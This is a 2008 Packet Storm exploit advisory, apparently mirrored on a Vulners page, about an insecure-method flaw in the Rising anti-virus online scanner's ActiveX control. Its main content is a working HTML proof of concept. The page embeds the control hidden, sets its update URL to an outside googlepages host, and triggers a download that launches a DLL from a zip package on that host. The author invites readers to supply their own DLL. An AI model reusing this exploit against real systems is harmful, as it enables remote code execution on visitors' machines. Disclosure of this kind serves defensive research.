Lucene search

K

rising-insecure.txt

🗓️ 26 Feb 2008 00:00:00Reported by John SmithType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 32 Views

Rising Anti-Virus Online Scanner Insecure Method Vulnerability, allows remote execution via Active

Show more
Code
`<!--  
- Rising is a popular anti-virus product around China.  
- there's an insecure method flaw inside its free online scanner.  
- it's quite easy to exploit the bug which leads to a remote execution.  
- visit http://online.rising.com.cn/free/index.htm to install the ActiveX first.  
- the demonstration below will download http://jsmith080220.googlepages.com/olupdate.zip and  
launch olupdate.dll inside the package.  
- you can code olupdate.dll yourself, in this case, I played with harmless calc.exe  
-->  
<html>  
<head><title>Rising Online Scanner Insecure Method Vulnerability</title></head>  
<body>  
<object style="display:none" classid="clsid:E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153" height="265" id="rav" width="430" VIEWASTEXT>  
<param NAME="BackColor" VALUE="#ECECEC">  
<param NAME="ForeColor" VALUE="#000000">  
</object>  
<script>  
function test()  
{  
rav.BaseURL = "http://jsmith080220.googlepages.com/";  
rav.Encardid = "0000$0000$0000";  
rav.UpdateEngine();  
}  
</script>  
<input type="button" value=" Go " onclick="test()"><br><br>  
wait for a few seconds after clicking the button  
</body></html>  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Feb 2008 00:00Current
7.4High risk
Vulners AI Score7.4
32
.json
Report